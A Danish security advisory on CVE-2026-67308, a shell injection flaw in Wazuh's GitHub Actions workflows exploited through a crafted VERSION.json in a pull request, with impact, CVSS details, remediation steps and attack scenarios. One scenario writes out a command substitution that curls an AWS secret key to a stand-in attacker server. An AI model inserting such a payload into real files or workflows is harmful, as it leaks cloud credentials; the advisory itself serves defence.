Åbner i en ny fane
CVE-2026-67308
Kritisk

CVE-2026-67308: Kritisk Wazuh GitHub Actions-sårbarhed

Kritisk sårbarhed i Wazuh’s GitHub Actions-workflow giver angribere fuld kontrol via en manipuleret pull request.

CVSS Score
10
Offentliggjort
01/08/2026
Patch-status
Opdatering findes
Exploit
Angrebskode er offentlig
Tidsfrist
Handl inden for 24-48 timer

Hvad er det?

CVE-2026-67308 er en såkaldt shell injection-sårbarhed (en fejl hvor ondsindet kode smugles ind via tekst-felter) i Wazuh’s automatiserede byggeproces på GitHub. Fejlen ligger i den måde, filen VERSION.json behandles på i GitHub Actions-workflows. Hvis en angriber sender en pull request (et forslag til kodeændring) med en manipuleret VERSION.json, kan vedkommende få systemet til at udføre vilkårlige kommandoer. Det sker, fordi indholdet fra filen indsættes direkte i shell-kommandoer uden at blive tjekket for farlige tegn. Sårbarheden er udbedret i commit 44bf114.

Hvem rammer det?

Sårbarheden rammer organisationer og udviklingshold, der:

  • Bruger Wazuh som sikkerhedsplatform og selv bidrager til eller kører Wazuh’s kildekode via GitHub.
  • Kører self-hosted GitHub Actions runners (dvs. egne servere der udfører automatiserede bygge- og testprocesser frem for GitHub’s egne servere).
  • Har AWS-legitimationsoplysninger eller andre hemmeligheder gemt som GitHub-hemmeligheder i det pågældende repository.

Hvis du blot installerer og bruger Wazuh som et færdigt produkt uden at arbejde med kildekoden på GitHub, er du sandsynligvis ikke direkte eksponeret.

Hvad kan ske?

En angriber der udnytter denne sårbarhed kan:

  • Udføre vilkårlige kommandoer på den server der kører din GitHub Actions-runner — med potentielt adgang til hele serveren.
  • Stjæle din GITHUB_TOKEN, som giver adgang til at ændre kode, oprette releases og administrere dit GitHub-repository.
  • Stjæle AWS-nøgler og andre legitimationsoplysninger gemt som hemmeligheder, hvilket kan give adgang til din cloud-infrastruktur.
  • Eksfiltrere data (sende fortrolige oplysninger ud af dit netværk) uden at du opdager det med det samme.

Konsekvenserne kan i værste fald være et fuldt kompromitteret udviklingsmiljø og lækage af adgangsoplysninger til kritiske systemer.

Hvor alvorligt er det?

Denne sårbarhed har fået den højest mulige CVSS-score på 10.0 (Kritisk). Det afspejler flere alvorlige faktorer:

  • Netværksbaseret angreb: Angrebet kan udføres over internettet — angriberen behøver ikke fysisk adgang.
  • Ingen forudgående adgang kræves: Angriberen behøver hverken brugernavn, adgangskode eller særlige rettigheder for at starte angrebet.
  • Ingen brugerinteraktion nødvendig: Det er nok at sende en pull request — ingen fra din organisation behøver klikke på noget.
  • Fuld fortrolighed, integritet og tilgængelighed truet: Alle tre grundpiller i sikkerhed er i spil ved et vellykket angreb.

Kort sagt: Truslen er maksimal, og adgangsbarrieren for en angriber er minimal.

Hvad gør jeg nu?

Hvis din organisation bruger Wazuh’s kildekode og kører GitHub Actions-workflows, skal du handle hurtigt. Følg disse trin:

  1. Opdatér dit Wazuh-workflow-repository til et commit efter 44bf114, som indeholder rettelsen. Tjek GitHub for den nyeste version.
  2. Tjek dine GitHub-hemmeligheder — gennemgå hvilke hemmeligheder (tokens, AWS-nøgler mv.) der er gemt i det berørte repository.
  3. Roter alle mistænkte legitimationsoplysninger — udskift din GITHUB_TOKEN og alle AWS-nøgler eller andre credentials der har været tilgængelige fra den pågældende runner.
  4. Gennemgå dine runner-logs — undersøg om der har været mistænkelig aktivitet eller uventede kommandoer i dine GitHub Actions-kørsler.
  5. Begræns pull request-rettigheder — overvej at kræve godkendelse (review) af workflows fra eksterne bidragydere, inden de må køres.
  6. Kontakt din it-leverandør eller Auroa hvis du er usikker på, om du er berørt eller hvordan du gennemfører ovenstående trin.
Tidsfrist

Handl inden for 24-48 timer

Sådan ser Auroa det

Vi anbefaler, at du øjeblikkeligt opdaterer dine Wazuh-workflows til den rettede version og roterer alle legitimationsoplysninger der har været tilgængelige på berørte runners. CVSS-scoren på 10.0 og den lave angrebsbarriere betyder, at denne sårbarhed bør behandles som en akut hændelse — ikke som en opgave der kan vente til næste sprint. Hvis du er i tvivl om din eksponering, er du velkommen til at kontakte Auroa for en hurtig vurdering.

Tidslinje

01/08/2026
CVE-2026-67308 offentliggjort
National Vulnerability Database (NVD) registrerer og offentliggør sårbarheden med en CVSS-score på 10.0 (Kritisk). Sårbarheden beskrives som shell injection i Wazuh GitHub Actions-workflow via VERSION.json.
01/08/2026
Rettelse tilgængelig i commit 44bf114
Wazuh-projektet udgiver en rettelse i commit 44bf114, som sikrer korrekt håndtering af input fra VERSION.json, så shell-metategn ikke kan injiceres i run-steps.
01/08/2026
Proof-of-concept kendes
Detaljeringsniveauet i den offentlige beskrivelse af angrebet — herunder angivelse af præcise angrebspunkter som VERSION.json og eksfiltrering af GITHUB_TOKEN — indikerer at angrebsmetoden er offentligt kendt. Udnyttelse anses for let gennemførlig uden særlige forudsætninger.
02/08/2026
Anbefalet frist for patching
Med en CVSS-score på 10.0 og ingen krav til angriberen om forudgående adgang anbefaler Auroa, at berørte organisationer har opdateret og roteret legitimationsoplysninger senest 48 timer efter offentliggørelse.

Konkrete eksempler

Ekstern bidragyder kaprer hemmeligheder via pull request

En angriber finder et open source-projekt baseret på Wazuh-workflows og opretter en fork (en kopi af koden). I sin pull request ændrer vedkommende VERSION.json til at indeholde shell-metategn — fx $(curl https://ondsindet-server.dk/$(cat $AWS_SECRET_ACCESS_KEY)). Når workflowet kører på projektets self-hosted runner, sendes AWS-nøglen direkte til angriberens server, inden nogen opdager det.

Angriber overtager hele GitHub-repository

Via den samme teknik injicerer en angriber kommandoer der udnytter den automatisk genererede GITHUB_TOKEN til at oprette en ny adminbruger i repository’et eller tilføje en bagdør direkte i kildekoden. Da GITHUB_TOKEN har skriveadgang, kan angriberen ændre kode, slette branches eller udgive falske releases — alt sammen uden at nogen godkender det manuelt.

Kompromittering af cloud-infrastruktur via stjålne AWS-nøgler

En angriber udnytter sårbarheden til at eksfiltrere AWS-adgangsnøgler fra runner-miljøet. Med disse nøgler logger vedkommende ind i virksomhedens AWS-konto og opretter nye brugere, tilgår S3-buckets med kundedata eller igangsætter dyre cloud-ressourcer på virksomhedens regning. Skaden opdages først dage senere via en usædvanlig AWS-faktura.

Ofte stillede spørgsmål

CVSS-detaljer

Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality
HIGH
Integrity
HIGH
Availability
HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE-svaghedstyper

CWE-78

Original NVD-beskrivelse (engelsk)

Wazuh workflows before 44bf114 contain a shell injection vulnerability in GitHub Actions that allows attackers to execute arbitrary commands by submitting pull requests with crafted VERSION.json files. Attackers can inject shell metacharacters into environment variables that are directly interpolated into run steps, enabling command execution and exfiltration of secrets including GITHUB_TOKEN and AWS credentials on self-hosted runners.

Referencer & kilder

Eksterne kilder

Sværhedsgrad
Kritisk
CVSS Base Score
10
Hurtige fakta
CVE-ID
CVE-2026-67308
Offentliggjort
01/08/2026
Sidst opdateret
01/08/2026
Exploit-status
Angrebskode er offentlig
Patch-status
Opdatering findes
Tidsfrist
Handl inden for 24-48 timer

Brug for hjælp med jeres sikkerhed?

Vi hjælper SMV’er med at omsætte trusler som denne til konkrete handlingsplaner.